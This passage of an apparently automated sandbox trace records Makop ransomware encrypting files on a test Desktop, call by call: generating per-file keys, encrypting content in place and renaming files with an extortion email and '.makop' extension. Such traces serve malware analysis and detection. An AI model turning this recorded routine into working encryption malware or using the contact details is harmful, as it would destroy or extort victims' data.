lpNewFilePointer=0x0) returned 1 [0128.406] WriteFile (in: hFile=0xac, lpBuffer=0x245fcc0*, nNumberOfBytesToWrite=0xc, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fcc0*, lpNumberOfBytesWritten=0x245fc90*=0xc, lpOverlapped=0x0) returned 1 [0128.407] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0128.407] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0128.407] GetProcessHeap () returned 0x550000 [0128.407] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x30) returned 0x56cb70 [0128.407] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x56cb70*, pdwDataLen=0x245fc78*=0x30, dwBufLen=0x30 | out: pbData=0x56cb70*, pdwDataLen=0x245fc78*=0x30) returned 1 [0128.407] CryptDestroyKey (hKey=0x56c880) returned 1 [0128.407] WriteFile (in: hFile=0xac, lpBuffer=0x56cb70*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x56cb70*, lpNumberOfBytesWritten=0x245fc90*=0x30, lpOverlapped=0x0) returned 1 [0128.408] WriteFile (in: hFile=0xac, lpBuffer=0x245fc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fc98*, lpNumberOfBytesWritten=0x245fc90*=0x4, lpOverlapped=0x0) returned 1 [0128.408] WriteFile (in: hFile=0xac, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245fc90*=0x10, lpOverlapped=0x0) returned 1 [0128.408] WriteFile (in: hFile=0xac, lpBuffer=0x569940*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x569940*, lpNumberOfBytesWritten=0x245fc90*=0x80, lpOverlapped=0x0) returned 1 [0128.408] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb8 | out: lpNewFilePointer=0x0) returned 1 [0128.408] WriteFile (in: hFile=0xac, lpBuffer=0x245fca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fca8*, lpNumberOfBytesWritten=0x245fc90*=0x8, lpOverlapped=0x0) returned 1 [0128.408] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0128.408] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0128.409] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.409] ReadFile (in: hFile=0xac, lpBuffer=0x2250020, nNumberOfBytesToRead=0x186f4, lpNumberOfBytesRead=0x245fc9c, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245fc9c*=0x186f4, lpOverlapped=0x0) returned 1 [0128.410] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245fc78*=0x18700, dwBufLen=0x18700 | out: pbData=0x2250020*, pdwDataLen=0x245fc78*=0x18700) returned 1 [0128.411] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.411] WriteFile (in: hFile=0xac, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0x18700, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245fc90*=0x18700, lpOverlapped=0x0) returned 1 [0128.412] CryptDestroyKey (hKey=0x56c880) returned 1 [0128.412] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x187c4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.412] SetEndOfFile (hFile=0xac) returned 1 [0128.416] GetProcessHeap () returned 0x550000 [0128.416] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56cb70 | out: hHeap=0x550000) returned 1 [0128.416] GetProcessHeap () returned 0x550000 [0128.416] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0128.416] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ps5_I.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ps5_i.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ps5_I.wav.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ps5_i.wav.[4b2e4630].[akzhq530@protonmail.com].makop")) returned 1 [0128.425] CloseHandle (hObject=0xac) returned 1 [0128.425] FindNextFileW (in: hFindFile=0x5699c8, lpFindFileData=0x245fd20 | out: lpFindFileData=0x245fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4406a20, ftCreationTime.dwHighDateTime=0x1d5db9a, ftLastAccessTime.dwLowDateTime=0x9df2b550, ftLastAccessTime.dwHighDateTime=0x1d5d850, ftLastWriteTime.dwLowDateTime=0x9df2b550, ftLastWriteTime.dwHighDateTime=0x1d5d850, nFileSizeHigh=0x0, nFileSizeLow=0x12062, dwReserved0=0x0, dwReserved1=0xffff, cFileName="RyIQW.odp", cAlternateFileName="")) returned 1 [0128.425] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RyIQW.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ryiqw.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0128.426] GetProcessHeap () returned 0x550000 [0128.426] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0128.426] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0128.426] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb0 | out: lpNewFilePointer=0x0) returned 1 [0128.426] WriteFile (in: hFile=0xac, lpBuffer=0x245fcc0*, nNumberOfBytesToWrite=0xe, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fcc0*, lpNumberOfBytesWritten=0x245fc90*=0xe, lpOverlapped=0x0) returned 1 [0128.427] CryptImportKey (in: hProv=0x564928, pbData=0x56cba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0128.427] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0128.427] GetProcessHeap () returned 0x550000 [0128.427] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x30) returned 0x56cb70 [0128.427] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x56cb70*, pdwDataLen=0x245fc78*=0x30, dwBufLen=0x30 | out: pbData=0x56cb70*, pdwDataLen=0x245fc78*=0x30) returned 1 [0128.427] CryptDestroyKey (hKey=0x56c880) returned 1 [0128.427] WriteFile (in: hFile=0xac, lpBuffer=0x56cb70*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x56cb70*, lpNumberOfBytesWritten=0x245fc90*=0x30, lpOverlapped=0x0) returned 1 [0128.427] WriteFile (in: hFile=0xac, lpBuffer=0x245fc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fc98*, lpNumberOfBytesWritten=0x245fc90*=0x4, lpOverlapped=0x0) returned 1 [0128.428] WriteFile (in: hFile=0xac, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245fc90*=0x10, lpOverlapped=0x0) returned 1 [0128.428] WriteFile (in: hFile=0xac, lpBuffer=0x56c928*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x56c928*, lpNumberOfBytesWritten=0x245fc90*=0x80, lpOverlapped=0x0) returned 1 [0128.428] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb8 | out: lpNewFilePointer=0x0) returned 1 [0128.428] WriteFile (in: hFile=0xac, lpBuffer=0x245fca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fca8*, lpNumberOfBytesWritten=0x245fc90*=0x8, lpOverlapped=0x0) returned 1 [0128.428] CryptImportKey (in: hProv=0x564928, pbData=0x56cba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0128.428] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0128.428] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.428] ReadFile (in: hFile=0xac, lpBuffer=0x2250020, nNumberOfBytesToRead=0x12062, lpNumberOfBytesRead=0x245fc9c, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245fc9c*=0x12062, lpOverlapped=0x0) returned 1 [0128.429] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245fc78*=0x12070, dwBufLen=0x12070 | out: pbData=0x2250020*, pdwDataLen=0x245fc78*=0x12070) returned 1 [0128.430] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.430] WriteFile (in: hFile=0xac, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0x12070, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245fc90*=0x12070, lpOverlapped=0x0) returned 1 [0128.430] CryptDestroyKey (hKey=0x56c880) returned 1 [0128.431] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x12134, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.431] SetEndOfFile (hFile=0xac) returned 1 [0128.436] GetProcessHeap () returned 0x550000 [0128.436] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56cb70 | out: hHeap=0x550000) returned 1 [0128.436] GetProcessHeap () returned 0x550000 [0128.436] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0128.436] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RyIQW.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ryiqw.odp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RyIQW.odp.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ryiqw.odp.[4b2e4630].[akzhq530@protonmail.com].makop")) returned 1 [0128.441] CloseHandle (hObject=0xac) returned 1 [0128.441] FindNextFileW (in: hFindFile=0x5699c8, lpFindFileData=0x245fd20 | out: lpFindFileData=0x245fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71ba09b0, ftCreationTime.dwHighDateTime=0x1d5e0f3, ftLastAccessTime.dwLowDateTime=0xe4b691a0, ftLastAccessTime.dwHighDateTime=0x1d5e606, ftLastWriteTime.dwLowDateTime=0xe4b691a0, ftLastWriteTime.dwHighDateTime=0x1d5e606, nFileSizeHigh=0x0, nFileSizeLow=0x28c5, dwReserved0=0x0, dwReserved1=0xffff, cFileName="tAXp_0e.mp3", cAlternateFileName="")) returned 1 [0128.441] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tAXp_0e.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\taxp_0e.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0128.441] GetProcessHeap () returned 0x550000 [0128.441] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0128.441] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0128.441] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb0 | out: lpNewFilePointer=0x0) returned 1 [0128.441] WriteFile (in: hFile=0xac, lpBuffer=0x245fcc0*, nNumberOfBytesToWrite=0xb, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fcc0*, lpNumberOfBytesWritten=0x245fc90*=0xb, lpOverlapped=0x0) returned 1 [0128.442] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0128.443] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0128.443] GetProcessHeap () returned 0x550000 [0128.443] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x40) returned 0x566d90 [0128.443] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x566d90*, pdwDataLen=0x245fc78*=0x40, dwBufLen=0x40 | out: pbData=0x566d90*, pdwDataLen=0x245fc78*=0x40) returned 1 [0128.443] CryptDestroyKey (hKey=0x56c880) returned 1 [0128.443] WriteFile (in: hFile=0xac, lpBuffer=0x566d90*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x566d90*, lpNumberOfBytesWritten=0x245fc90*=0x40, lpOverlapped=0x0) returned 1 [0128.443] WriteFile (in: hFile=0xac, lpBuffer=0x245fc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fc98*, lpNumberOfBytesWritten=0x245fc90*=0x4, lpOverlapped=0x0) returned 1 [0128.443] WriteFile (in: hFile=0xac, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245fc90*=0x10, lpOverlapped=0x0) returned 1 [0128.443] WriteFile (in: hFile=0xac, lpBuffer=0x569940*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x569940*, lpNumberOfBytesWritten=0x245fc90*=0x80, lpOverlapped=0x0) returned 1 [0128.443] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb8 | out: lpNewFilePointer=0x0) returned 1 [0128.443] WriteFile (in: hFile=0xac, lpBuffer=0x245fca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fca8*, lpNumberOfBytesWritten=0x245fc90*=0x8, lpOverlapped=0x0) returned 1 [0128.443] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0128.443] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0128.444] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.444] ReadFile (in: hFile=0xac, lpBuffer=0x2250020, nNumberOfBytesToRead=0x28c5, lpNumberOfBytesRead=0x245fc9c, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245fc9c*=0x28c5, lpOverlapped=0x0) returned 1 [0128.444] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245fc78*=0x28d0, dwBufLen=0x28d0 | out: pbData=0x2250020*, pdwDataLen=0x245fc78*=0x28d0) returned 1 [0128.444] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.444] WriteFile (in: hFile=0xac, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0x28d0, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245fc90*=0x28d0, lpOverlapped=0x0) returned 1 [0128.445] CryptDestroyKey (hKey=0x56c880) returned 1 [0128.445] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x29a4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.445] SetEndOfFile (hFile=0xac) returned 1 [0128.448] GetProcessHeap () returned 0x550000 [0128.448] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566d90 | out: hHeap=0x550000) returned 1 [0128.449] GetProcessHeap () returned 0x550000 [0128.449] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0128.449] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tAXp_0e.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\taxp_0e.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tAXp_0e.mp3.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\taxp_0e.mp3.[4b2e4630].[akzhq530@protonmail.com].makop")) returned 1 [0128.453] CloseHandle (hObject=0xac) returned 1 [0128.453] FindNextFileW (in: hFindFile=0x5699c8, lpFindFileData=0x245fd20 | out: lpFindFileData=0x245fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x663f3450, ftCreationTime.dwHighDateTime=0x1d5e609, ftLastAccessTime.dwLowDateTime=0x8cb3e630, ftLastAccessTime.dwHighDateTime=0x1d5e6ef, ftLastWriteTime.dwLowDateTime=0x8cb3e630, ftLastWriteTime.dwHighDateTime=0x1d5e6ef, nFileSizeHigh=0x0, nFileSizeLow=0x130ac, dwReserved0=0x0, dwReserved1=0xffff, cFileName="VbHeUTKIv8xjee612.flv", cAlternateFileName="VBHEUT~1.FLV")) returned 1 [0128.453] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VbHeUTKIv8xjee612.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vbheutkiv8xjee612.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0128.453] GetProcessHeap () returned 0x550000 [0128.453] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0128.453] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0128.453] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb0 | out: lpNewFilePointer=0x0) returned 1 [0128.454] WriteFile (in: hFile=0xac, lpBuffer=0x245fcc0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fcc0*, lpNumberOfBytesWritten=0x245fc90*=0x4, lpOverlapped=0x0) returned 1 [0128.455] CryptImportKey (in: hProv=0x564928, pbData=0x56cba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0128.455] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0128.455] GetProcessHeap () returned 0x550000 [0128.455] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x50) returned 0x56d278 [0128.455] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x56d278*, pdwDataLen=0x245fc78*=0x50, dwBufLen=0x50 | out: pbData=0x56d278*, pdwDataLen=0x245fc78*=0x50) returned 1 [0128.455] CryptDestroyKey (hKey=0x56c880) returned 1 [0128.455] WriteFile (in: hFile=0xac, lpBuffer=0x56d278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x56d278*, lpNumberOfBytesWritten=0x245fc90*=0x50, lpOverlapped=0x0) returned 1 [0128.455] WriteFile (in: hFile=0xac, lpBuffer=0x245fc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fc98*, lpNumberOfBytesWritten=0x245fc90*=0x4, lpOverlapped=0x0) returned 1 [0128.455] WriteFile (in: hFile=0xac, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245fc90*=0x10, lpOverlapped=0x0) returned 1 [0128.455] WriteFile (in: hFile=0xac, lpBuffer=0x56c928*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x56c928*, lpNumberOfBytesWritten=0x245fc90*=0x80, lpOverlapped=0x0) returned 1 [0128.455] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb8 | out: lpNewFilePointer=0x0) returned 1 [0128.455] WriteFile (in: hFile=0xac, lpBuffer=0x245fca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fca8*, lpNumberOfBytesWritten=0x245fc90*=0x8, lpOverlapped=0x0) returned 1 [0128.456] CryptImportKey (in: hProv=0x564928, pbData=0x56cba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0128.456] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0128.456] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.456] ReadFile (in: hFile=0xac, lpBuffer=0x2250020, nNumberOfBytesToRead=0x130ac, lpNumberOfBytesRead=0x245fc9c, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245fc9c*=0x130ac, lpOverlapped=0x0) returned 1 [0128.457] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245fc78*=0x130b0, dwBufLen=0x130b0 | out: pbData=0x2250020*, pdwDataLen=0x245fc78*=0x130b0) returned 1 [0128.458] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.458] WriteFile (in: hFile=0xac, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0x130b0, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245fc90*=0x130b0, lpOverlapped=0x0) returned 1 [0128.459] CryptDestroyKey (hKey=0x56c880) returned 1 [0128.459] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x13194, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.459] SetEndOfFile (hFile=0xac) returned 1 [0128.485] GetProcessHeap () returned 0x550000 [0128.485] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56d278 | out: hHeap=0x550000) returned 1 [0128.485] GetProcessHeap () returned 0x550000 [0128.485] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0128.485] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VbHeUTKIv8xjee612.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vbheutkiv8xjee612.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VbHeUTKIv8xjee612.flv.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vbheutkiv8xjee612.flv.[4b2e4630].[akzhq530@protonmail.com].makop")) returned 1 [0128.515] CloseHandle (hObject=0xac) returned 1 [0128.515] FindNextFileW (in: hFindFile=0x5699c8, lpFindFileData=0x245fd20 | out: lpFindFileData=0x245fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x761647d0, ftCreationTime.dwHighDateTime=0x1d5de96, ftLastAccessTime.dwLowDateTime=0x9b4fc8c0, ftLastAccessTime.dwHighDateTime=0x1d5e65a, ftLastWriteTime.dwLowDateTime=0x9b4fc8c0, ftLastWriteTime.dwHighDateTime=0x1d5e65a, nFileSizeHigh=0x0, nFileSizeLow=0x1627f, dwReserved0=0x0, dwReserved1=0xffff, cFileName="vHnU2xHSEd4BF b.pps", cAlternateFileName="VHNU2X~1.PPS")) returned 1 [0128.515] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vHnU2xHSEd4BF b.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vhnu2xhsed4bf b.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0128.516] GetProcessHeap () returned 0x550000 [0128.516] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0128.516] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0128.516] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb0 | out: lpNewFilePointer=0x0) returned 1 [0128.516] WriteFile (in: hFile=0xac, lpBuffer=0x245fcc0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fcc0*, lpNumberOfBytesWritten=0x245fc90*=0x1, lpOverlapped=0x0) returned 1 [0128.517] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0128.517] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0128.517] GetProcessHeap () returned 0x550000 [0128.517] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x50) returned 0x56d278 [0128.518] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x56d278*, pdwDataLen=0x245fc78*=0x50, dwBufLen=0x50 | out: pbData=0x56d278*, pdwDataLen=0x245fc78*=0x50) returned 1 [0128.518] CryptDestroyKey (hKey=0x56c880) returned 1 [0128.518] WriteFile (in: hFile=0xac, lpBuffer=0x56d278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x56d278*, lpNumberOfBytesWritten=0x245fc90*=0x50, lpOverlapped=0x0) returned 1 [0128.518] WriteFile (in: hFile=0xac, lpBuffer=0x245fc98*, nNumberOfBytesToWrite=0x4, 